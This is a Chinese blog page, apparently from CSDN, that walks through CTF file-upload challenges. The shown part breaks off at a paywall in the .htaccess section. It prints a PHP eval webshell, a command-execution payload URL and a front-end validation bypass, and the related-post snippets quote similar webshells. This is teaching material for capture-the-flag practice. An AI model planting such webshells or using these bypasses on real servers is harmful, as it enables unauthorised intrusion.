CTF技能梳理系列 ---- 文件上传

最新推荐文章于 2024-06-03 17:24:52 发布
最新推荐文章于 2024-06-03 17:24:52 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: Web安全 文件上传 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Joker_York/article/details/108361445
版权
本文深入探讨了CTF中的文件上传漏洞,包括无验证、前端验证、.htaccess、MIME验证、文件头验证、%00截断、双写绕过、GetImageSize函数绕过、文件后缀名绕过、.user.ini包含上传和绕过exit等技术,通过实例详细解析了各种绕过策略和防御方法。
摘要由CSDN通过智能技术生成

主要以CTFHub技能树里的文件上传题目为例

无验证

直接上传webshell。

<?php @eval($_GET[cmd]); ?>

在这里插入图片描述
payload:

http://url/upload/raw_shell.php?cmd=system("cat ../flag_161493477.php");

前端验证

查看页面源码,可以看到前端的JS验证代码:

<script>
function checkfilesuffix()
{
   
    var file=document.getElementsByName('file')[0]['value'];
    if(file==""||file==null)
    {
   
        alert("请添加上传文件");
        return false;
    }
    else
    {
   
        var whitelist=new Array(".jpg",".png",".gif");	# 白名单
        var file_suffix=file.substring(file.lastIndexOf("."));	# 读取文件后缀名
        if(whitelist.indexOf(file_suffix) == -1)	# 不在白名单内则上传失败
        {
   
            alert("该文件不允许上传");
            return false;
        }
    }
}
</script>

将webshell文件后缀名改为白名单中的后缀,上传时使用burpsuite抓包修改后缀即可。
在这里插入图片描述
上传成功,利用system函数搜索、读取flag即可。

.htaccess

.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过.htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访

最低0.47元/天 解锁文章
Joker_York
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件,jsp限定后缀名的文件功能
01-15
文件,图片上,限定后缀名的文件功能
ctf-all-in-one
01-30
ctf-all-in-one
CTF-show-文件
qq_52696970的博客
04-02 4297
文件1、web1512、web1523、web1534、web1545、web1556、web1567、web1578、web1589、web15910、web16011、web16112、web162 1、web151 (1)法一:抓包改后缀 题目提示是前台校验,发现能上图片,于是准备好的一句话木马改为png后缀上再抓包 <?php @eval($_POST['x']);?> 将文件后缀修改为php再放包,可以看到文件成功 上成功后蚁剑连接即可得到flag (2)法二:禁J
CTF-Web】文件漏洞学习笔记(ctfshow题目)
最新发布
jayq1的博客
06-03 1593
文件漏洞学习笔记,ctfshow题目为依托
CTFSHOW文件
羽的博客
11-19 8897
151 绕过前端验证 方法1:直接关闭浏览器的js 方法2:上.png(没错,只能是png,gif和jpg都不行)文件然后bp抓包后修改后缀 152
ctf技能----文件
qq_44418229的博客
05-10 1116
ctf技能----文件
ctf-web入门-文件
whisper921的博客
05-28 4024
Web 151 考点:后端无验证,前端校验 查看源码可以发现只能上png图片 修改为php 写一个php文件一句话木马 可以发现已经成功上 查看上级目录发现可疑文件 查看flag.php文件内容得出flag 得到flag Web 152 考点:绕过前端校验 解题思路: 经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。那就抓包一下。 将Content-Type内容修改成image/png,重发,发现成...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
ctf-all-in-one.pdf
05-25
CTF-All-In-One(CTF 从入门到放弃) ——“与其相信谣言,不如一直学习。”ctf基础加入门题
CTF-All-In-One 20171015
10-15
CTF-All-In-One 20171015 CTF-All-In-One 20171015 一本 CTF 领域的大杂烩指南
2024年最全CTFshow web入门——文件_ctfshow文件,给大家安排上
2401_84520377的博客
05-05 954
一个图片木马,发现上不了,经过一系列的尝试发现是对文件内容作了些过滤,过滤了php,所以采用简短的语句进行绕过。经过一系列的方法测试上题的解题方法并不适用于本题。直接改前端,后端会校验,文件不合格。剩下的步骤与151相同查看上级目录,发现flag.php,查看flag.php内容得到flag。那就直接输出flag算了,不搞一句话了。要修改的图片的路径,1.png是使用的文件,可以不存在。查看flag.php文件内容得出flag。下面的代码可以检测是否有gd库的存在。将生成的图片上,bp抓包。
【web-ctfctf-pikachu-fileupload
一个努力生活的人的博客
08-21 1049
ctf-pikachu-fileupload
小白的ctf之路之文件浅谈
glass_york的博客
01-12 1645
文件
JSPX文件绕过网站后缀名检查
大方子
10-08 3452
这几天在做渗透测试的时候,发现一个有趣的东西。目标有上漏洞,但是无论如何都没法让webshell执行。访问任何jsp文件都跳到登录的地 方,然后尝试过变换jsp的大小写,虽然不跳了,但是直接不解析,利用apache的解析漏洞上文件,也不解析。后来只能放弃… 今天在工作中做另外一个站的渗透测试的时候,有个很特别的东西,JSPX,发现可以解析。然后去找了下是否apache默认解析jspx的文件。...
文件包含漏洞总结都在这里了
yuanxu8877的博客
10-20 3055
文件包含漏洞总结,全在这里了
2018HitbCTF 萌新的upload题目writeup
publicStr的博客
04-14 1878
开始前的例行叨叨:被虐到怀疑人生,比赛群加了不少,题没做出来,签到倒是越来越专业了。记录下比赛后两小时才做出来的最简单web题upload。记录下尝试过的姿势。题目介绍:根目录下:/system/   403/admin/    403/upload/   403/upfile/     403还有某个需要寻找的目录文件:/index.html/flag.php/upload.php/pic.ph...
文件漏洞详解(CTF篇)
热门推荐
nobugnomoney的博客
09-16 1万+
需要了解的前置知识: 1.什么是文件文件就是通过流的方式将文件写到服务器上 文件必须以POST提交表单 表单中需要 <input type="file" name="upload"> 2.一句话木马 <?php eval($_POST['a']) ?> 其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们递过去的任意PHP语句。这便是一句话木马
php 写入文件 ctf,php代码审计前奏之ctfshow之文件
weixin_33213367的博客
03-10 839
想搞好代码审计,必须要搞懂其中一些危险函数危险应用,以及过滤不足,故以 CTF 来练习。web151~前端验证直接抓包修改后缀。web152~前端+MIME直接抓包修改后缀。web153~.user.ini使用条件:(1)服务器脚本语言为PHP 服务器使用CGI/FastCGI模式(2)上目录下要有可执行的php文件使用方式:上一张图片马上 .user.iniauto_prepend_fil...
ctfhub 文件 - 00截断
06-28
ctfhub 文件 - 00截断是一种常见的安全漏洞,攻击者可以通过截断文件名或者文件内容来绕过文件的限制,从而上恶意文件或者执行任意代码。这种漏洞需要开发人员在编写文件功能时注意对文件名和内容进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值